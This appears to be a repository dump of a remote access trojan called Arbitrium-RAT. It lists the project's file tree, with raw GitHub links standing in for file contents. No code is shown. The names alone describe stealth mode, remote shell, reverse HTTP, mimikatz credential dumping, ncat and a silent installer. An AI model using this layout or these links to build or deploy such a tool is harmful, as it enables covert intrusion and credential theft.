├── .gitmodules ├── Clients ├── LinuxApp │ ├── runFrame.py │ └── toolbox └── WindowsApp │ ├── Client_tools │ ├── SFXAutoInstaller.conf │ ├── start_script.vbs │ └── toolbox.exe │ ├── buildClient.bat │ ├── release │ ├── Standalone.exe │ ├── runFrame.exe │ ├── start_script.vbs │ └── toolbox.exe │ └── runFrame.py ├── LICENSE ├── README.md ├── ServerAPI ├── JS_scripts │ ├── StealthMode.js │ ├── checkupdate.js │ ├── init.js │ └── runshell.js ├── assets │ └── .empty ├── initProxy.py ├── main.py ├── misc │ ├── initproxy.lst │ └── ncatBSD ├── modules │ ├── discover.py │ ├── mimikatz.py │ ├── ports.py │ └── runCMD.py ├── reverse_http.py ├── runserver.sh └── threads │ └── .empty └── setAPI_FQDN.sh /.gitmodules: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/.gitmodules -------------------------------------------------------------------------------- /Clients/LinuxApp/runFrame.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/LinuxApp/runFrame.py -------------------------------------------------------------------------------- /Clients/LinuxApp/toolbox: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/LinuxApp/toolbox -------------------------------------------------------------------------------- /Clients/WindowsApp/Client_tools/SFXAutoInstaller.conf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/Client_tools/SFXAutoInstaller.conf -------------------------------------------------------------------------------- /Clients/WindowsApp/Client_tools/start_script.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/Client_tools/start_script.vbs -------------------------------------------------------------------------------- /Clients/WindowsApp/Client_tools/toolbox.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/Client_tools/toolbox.exe -------------------------------------------------------------------------------- /Clients/WindowsApp/buildClient.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/buildClient.bat -------------------------------------------------------------------------------- /Clients/WindowsApp/release/Standalone.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/release/Standalone.exe -------------------------------------------------------------------------------- /Clients/WindowsApp/release/runFrame.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/release/runFrame.exe -------------------------------------------------------------------------------- /Clients/WindowsApp/release/start_script.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/release/start_script.vbs -------------------------------------------------------------------------------- /Clients/WindowsApp/release/toolbox.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/release/toolbox.exe -------------------------------------------------------------------------------- /Clients/WindowsApp/runFrame.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/Clients/WindowsApp/runFrame.py -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/README.md -------------------------------------------------------------------------------- /ServerAPI/JS_scripts/StealthMode.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/JS_scripts/StealthMode.js -------------------------------------------------------------------------------- /ServerAPI/JS_scripts/checkupdate.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/JS_scripts/checkupdate.js -------------------------------------------------------------------------------- /ServerAPI/JS_scripts/init.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/JS_scripts/init.js -------------------------------------------------------------------------------- /ServerAPI/JS_scripts/runshell.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/JS_scripts/runshell.js -------------------------------------------------------------------------------- /ServerAPI/assets/.empty: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ServerAPI/initProxy.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/initProxy.py -------------------------------------------------------------------------------- /ServerAPI/main.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/main.py -------------------------------------------------------------------------------- /ServerAPI/misc/initproxy.lst: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ServerAPI/misc/ncatBSD: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/misc/ncatBSD -------------------------------------------------------------------------------- /ServerAPI/modules/discover.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/modules/discover.py -------------------------------------------------------------------------------- /ServerAPI/modules/mimikatz.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/modules/mimikatz.py -------------------------------------------------------------------------------- /ServerAPI/modules/ports.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/modules/ports.py -------------------------------------------------------------------------------- /ServerAPI/modules/runCMD.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/modules/runCMD.py -------------------------------------------------------------------------------- /ServerAPI/reverse_http.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/reverse_http.py -------------------------------------------------------------------------------- /ServerAPI/runserver.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/ServerAPI/runserver.sh -------------------------------------------------------------------------------- /ServerAPI/threads/.empty: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /setAPI_FQDN.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/im-hanzou/Arbitrium-RAT/HEAD/setAPI_FQDN.sh --------------------------------------------------------------------------------